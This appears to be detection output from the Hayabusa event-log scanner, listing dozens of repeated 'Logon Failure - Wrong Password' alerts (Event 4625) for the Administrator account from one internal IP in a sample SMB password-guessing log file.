01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7eBQevVhmZs5gHFD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lyQCs0PG6fGzpidu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnsPjnCieyoFIbJZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ku6mjVaG1lCJrAo1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VwiyVIWHOGuHzhdO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 92v1rXcj5c0Lt3OF : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yO2JYd6FfM2Y7px9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ltr5g8ZWUAdrPKxg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fjiPMy5uOTbbmaQ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HDRVOzxca9wDJziV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DV28RjUK26Je2Dr9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seoetT43w0S3FEss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IdIU9Q9Ig4Bd3Aps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGzuHSHT59Qnp5jI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wPA1J7aQrZ064WSf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhLFXDMUKGfdoc4S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: apVAhc6o3dhLmUll : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FYMdQeB4ZpFm8xDh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QewW1ISqRdXwtSXA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SFhBcgZfc9VZ5S8S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a4ZSRW7F65yDNbJd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HrbzGNYIbjErVtDR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eFcGaL3asLVIF08d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dhJvIM5PzA9U6GTD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KYrfD15TPp8OuST4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8d4CbZSTHhl7fRfa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IItrtl1h3PsKviaQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WVeoptuwLNKlm0V2 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rf6Ri9Lm81mScRt4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NPVkTRUILL5czcbF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QZJq3kjykwzh0hVh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lHL4KuirjQ96Dgfw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DSPjDklMHdW6LqK5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EL0oMweyFgI0MEdM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NJS2dZhWmCGF1Qos : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bNR5dXXnx0LeyNmW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ApUMxqDiqDNo6hrF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o3d1caGukhhBHp6s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oxDVCaWpkSECRoml : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: coqijUGaaVJXY4GV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ATPa6qMbfQ9QDrW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mnQEE00r01jhCNzr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ir9sY7kG6vbOad4z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: REuk1RZ5eRs3pSbT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 91gfIcAUvKrSAENh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MtrVV1ux0v5w5XWZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rFpyAqPQP77Ls6ir : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nvwp4DimL7SgBmb0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1lnJZDjghQNQxfG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pBN1g8NBIj6WMrhz : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cJMUobtFTwOQTgqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QGZeGqe9rC172BVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zNP99dMvvDQl8WVw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qcwp0odjR0LfM11y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6VjaFCzZr8iUUovn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C3YniJHC0Cswfti0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 63lZpExTzSzNR96C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fKI61MTXJ5x9WF56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhWYNEPWgh03cQSJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pvZg2LTYtsUhvBhr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BENGUFtNxdPjaS03 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fY1s0OG9JR38H6rm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LblLG1Il6ngkuAOo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PAZ83Onp00vURKSz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxvywmA4UMI04zm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1vH6DSer71gxEDRc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uDNQibannB453BKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 02qkYtCIrOj38agd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: atDwGfxC4RLYYDAF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fCTUmKwLxkKCoCTn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DBE7Y8yJMNSkJlaK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N7VGVfH05BC7bgaZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lP7kC2ayRIEeL5sw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2cQOn41cB2t0ZkSP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PpOyXZwlcCw63tWP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.445 